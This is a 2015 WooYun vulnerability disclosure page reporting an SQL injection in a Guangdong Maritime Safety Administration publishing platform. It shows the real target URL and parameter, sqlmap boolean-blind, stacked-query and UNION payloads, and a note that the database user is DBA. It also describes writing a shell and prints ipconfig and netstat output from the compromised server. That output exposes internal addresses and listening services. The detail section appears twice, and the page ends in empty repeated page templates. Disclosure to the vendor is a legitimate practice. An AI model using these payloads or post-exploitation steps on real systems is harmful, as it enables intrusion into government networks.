广东海事局某信息发布平台存在SQL注入漏洞(威胁内网安全)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0121756

漏洞标题：广东海事局某信息发布平台存在SQL注入漏洞(威胁内网安全)

漏洞作者：金枪银矛小霸王

提交时间：2015-06-20 13:05

修复时间：2015-08-07 11:40

公开时间：2015-08-07 11:40

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-06-20：细节已通知厂商并且等待厂商处理中
2015-06-23：厂商已经确认，细节仅向厂商公开
2015-07-03：细节向核心白帽子及相关领域专家公开
2015-07-13：细节向普通白帽子公开
2015-07-23：细节向实习白帽子公开
2015-08-07：细节向公众公开

简要描述：

。。。

详细说明：

广东海事局某信息发布平台存在SQL注入漏洞(威胁内网安全)
url:http://183.62.26.194:81/hbxxfb/Childpage/tztginfo.aspx?Pid=d691ecae-42ce-4999-b360-d46982a15dff

Parameter: Pid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Pid=d691ecae-42ce-4999-b360-d46982a15dff' AND 4013=4013 AND 'pGQP'='pGQP
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: Pid=d691ecae-42ce-4999-b360-d46982a15dff';WAITFOR DELAY '0:0:5'--
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: Pid=-5551' UNION ALL SELECT NULL,CHAR(113)+CHAR(98)+CHAR(122)+CHAR(107)+CHAR(113)+CHAR(88)+CHAR(81)+CHAR(81)+CHAR(86)+CHAR(76)+CHAR(72)+CHAR(86)+CHAR(98)+CHAR(122)+CHAR(79)+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(118)+CHAR(113),NULL,NULL-- 
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---

current user is DBA:    True

交互写shell

---
\\ 的用户帐户
 
-------------------------------------------------------------------------------
---
command standard output:
---
Windows IP 配置
 
 
以太网适配器 本地连接 4:
 
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
 
以太网适配器 本地连接 3:
 
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
 
以太网适配器 本地连接 2:
 
   连接特定的 DNS 后缀 . . . . . . . : 
   本地链接 IPv6 地址. . . . . . . . : fe80::810a:9c1b:ebc:1de6
   IPv4 地址 . . . . . . . . . . . . : 198.28.51.224
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 198.28.51.254
 
以太网适配器 本地连接:
 
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
 
隧道适配器 isatap.{31EED92D-D289-4CB6-A969-E95327D9ED35}:
 
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
 
隧道适配器 isatap.{10295A0A-8CA3-41DA-B96B-F976CA22016E}:
 
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
---

开放端口

活动连接
 
  协议  本地地址          外部地址        状态           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       948
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       3516
  TCP    0.0.0.0:6005           0.0.0.0:0              LISTENING       1580
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING       668
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING       276
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING       260
  TCP    0.0.0.0:49155          0.0.0.0:0              LISTENING       728
  TCP    0.0.0.0:49156          0.0.0.0:0              LISTENING       720
  TCP    0.0.0.0:49157          0.0.0.0:0              LISTENING       3544
  TCP    127.0.0.1:1434         0.0.0.0:0              LISTENING       1580
  TCP    198.28.51.224:89       0.0.0.0:0              LISTENING       4
  TCP    198.28.51.224:139      0.0.0.0:0              LISTENING       4
  TCP    198.28.51.224:445      198.28.51.207:49669    ESTABLISHED     4
  TCP    198.28.51.224:6005     198.28.51.207:53312    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.207:53313    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.207:53314    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.207:53315    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.207:53316    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.207:53317    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.207:53318    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.207:53319    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.207:53320    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.207:53321    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.207:58450    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.225:49241    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.225:49275    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.248:49492    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.248:50193    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.248:50338    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.248:50752    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.248:51889    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.248:54360    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.248:55884    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.248:59647    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.248:60813    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.248:62175    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.248:63425    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.248:63754    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.248:64564    ESTABLISHED     1580
  TCP    198.28.51.224:8081     0.0.0.0:0              LISTENING       4
  TCP    198.28.51.224:49158    198.28.51.225:6005     ESTABLISHED     4012
  TCP    [::]:80                [::]:0                 LISTENING       4
  TCP    [::]:135               [::]:0                 LISTENING       948
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:3389              [::]:0                 LISTENING       3516
  TCP    [::]:6005              [::]:0                 LISTENING       1580
  TCP    [::]:47001             [::]:0                 LISTENING       4
  TCP    [::]:49152             [::]:0                 LISTENING       668
  TCP    [::]:49153             [::]:0                 LISTENING       276
  TCP    [::]:49154             [::]:0                 LISTENING       260
  TCP    [::]:49155             [::]:0                 LISTENING       728
  TCP    [::]:49156             [::]:0                 LISTENING       720
  TCP    [::]:49157             [::]:0                 LISTENING       3544
  TCP    [::1]:1434             [::]:0                 LISTENING       1580
  TCP    [fe80::810a:9c1b:ebc:1de6]:65511  [fe80::34ce:bad3:9719:1e0d]:135  TIME_WAIT       0
  TCP    [fe80::810a:9c1b:ebc:1de6]:65512  [fe80::34ce:bad3:9719:1e0d]:49246  TIME_WAIT       0
  UDP    0.0.0.0:123            *:*                                    616
  UDP    0.0.0.0:500            *:*                                    260
  UDP    0.0.0.0:4500           *:*                                    260
  UDP    0.0.0.0:5355           *:*                                    1036
  UDP    198.28.51.224:137      *:*                                    4
  UDP    198.28.51.224:138      *:*                                    4
  UDP    [::]:123               *:*                                    616
  UDP    [::]:500               *:*                                    260

漏洞证明：

Parameter: Pid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Pid=d691ecae-42ce-4999-b360-d46982a15dff' AND 4013=4013 AND 'pGQP'='pGQP
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: Pid=d691ecae-42ce-4999-b360-d46982a15dff';WAITFOR DELAY '0:0:5'--
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: Pid=-5551' UNION ALL SELECT NULL,CHAR(113)+CHAR(98)+CHAR(122)+CHAR(107)+CHAR(113)+CHAR(88)+CHAR(81)+CHAR(81)+CHAR(86)+CHAR(76)+CHAR(72)+CHAR(86)+CHAR(98)+CHAR(122)+CHAR(79)+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(118)+CHAR(113),NULL,NULL-- 
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---

current user is DBA:    True

交互写shell

---
\\ 的用户帐户
 
-------------------------------------------------------------------------------
---
command standard output:
---
Windows IP 配置
 
 
以太网适配器 本地连接 4:
 
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
 
以太网适配器 本地连接 3:
 
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
 
以太网适配器 本地连接 2:
 
   连接特定的 DNS 后缀 . . . . . . . : 
   本地链接 IPv6 地址. . . . . . . . : fe80::810a:9c1b:ebc:1de6
   IPv4 地址 . . . . . . . . . . . . : 198.28.51.224
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 198.28.51.254
 
以太网适配器 本地连接:
 
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
 
隧道适配器 isatap.{31EED92D-D289-4CB6-A969-E95327D9ED35}:
 
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
 
隧道适配器 isatap.{10295A0A-8CA3-41DA-B96B-F976CA22016E}:
 
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
---

开放端口

活动连接
 
  协议  本地地址          外部地址        状态           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       948
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       3516
  TCP    0.0.0.0:6005           0.0.0.0:0              LISTENING       1580
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING       668
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING       276
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING       260
  TCP    0.0.0.0:49155          0.0.0.0:0              LISTENING       728
  TCP    0.0.0.0:49156          0.0.0.0:0              LISTENING       720
  TCP    0.0.0.0:49157          0.0.0.0:0              LISTENING       3544
  TCP    127.0.0.1:1434         0.0.0.0:0              LISTENING       1580
  TCP    198.28.51.224:89       0.0.0.0:0              LISTENING       4
  TCP    198.28.51.224:139      0.0.0.0:0              LISTENING       4
  TCP    198.28.51.224:445      198.28.51.207:49669    ESTABLISHED     4
  TCP    198.28.51.224:6005     198.28.51.207:53312    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.207:53313    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.207:53314    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.207:53315    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.207:53316    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.207:53317    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.207:53318    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.207:53319    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.207:53320    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.207:53321    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.207:58450    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.225:49241    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.225:49275    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.248:49492    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.248:50193    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.248:50338    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.248:50752    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.248:51889    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.248:54360    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.248:55884    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.248:59647    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.248:60813    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.248:62175    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.248:63425    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.248:63754    ESTABLISHED     1580
  TCP    198.28.51.224:6005     198.28.51.248:64564    ESTABLISHED     1580
  TCP    198.28.51.224:8081     0.0.0.0:0              LISTENING       4
  TCP    198.28.51.224:49158    198.28.51.225:6005     ESTABLISHED     4012
  TCP    [::]:80                [::]:0                 LISTENING       4
  TCP    [::]:135               [::]:0                 LISTENING       948
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:3389              [::]:0                 LISTENING       3516
  TCP    [::]:6005              [::]:0                 LISTENING       1580
  TCP    [::]:47001             [::]:0                 LISTENING       4
  TCP    [::]:49152             [::]:0                 LISTENING       668
  TCP    [::]:49153             [::]:0                 LISTENING       276
  TCP    [::]:49154             [::]:0                 LISTENING       260
  TCP    [::]:49155             [::]:0                 LISTENING       728
  TCP    [::]:49156             [::]:0                 LISTENING       720
  TCP    [::]:49157             [::]:0                 LISTENING       3544
  TCP    [::1]:1434             [::]:0                 LISTENING       1580
  TCP    [fe80::810a:9c1b:ebc:1de6]:65511  [fe80::34ce:bad3:9719:1e0d]:135  TIME_WAIT       0
  TCP    [fe80::810a:9c1b:ebc:1de6]:65512  [fe80::34ce:bad3:9719:1e0d]:49246  TIME_WAIT       0
  UDP    0.0.0.0:123            *:*                                    616
  UDP    0.0.0.0:500            *:*                                    260
  UDP    0.0.0.0:4500           *:*                                    260
  UDP    0.0.0.0:5355           *:*                                    1036
  UDP    198.28.51.224:137      *:*                                    4
  UDP    198.28.51.224:138      *:*                                    4
  UDP    [::]:123               *:*                                    616
  UDP    [::]:500               *:*                                    260

修复方案：

修复注入漏洞

版权声明：转载请注明来源金枪银矛小霸王@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2015-06-23 11:39

厂商回复：

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据：高
攻击成本：低
造成影响：高
综合评级为：高，rank：10
正在联系相关网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0121756

漏洞标题：广东海事局某信息发布平台存在SQL注入漏洞(威胁内网安全)

相关厂商：www.gdmsa.gov.cn

漏洞作者：金枪银矛小霸王

提交时间：2015-06-20 13:05

修复时间：2015-08-07 11:40

公开时间：2015-08-07 11:40

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源金枪银矛小霸王@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0121756

漏洞标题：广东海事局某信息发布平台存在SQL注入漏洞(威胁内网安全)

相关厂商：www.gdmsa.gov.cn

漏洞作者： 金枪银矛小霸王

提交时间：2015-06-20 13:05

修复时间：2015-08-07 11:40

公开时间：2015-08-07 11:40

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(广东省信息安全测评中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0121756"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 金枪银矛小霸王@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：金枪银矛小霸王

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源金枪银矛小霸王@乌云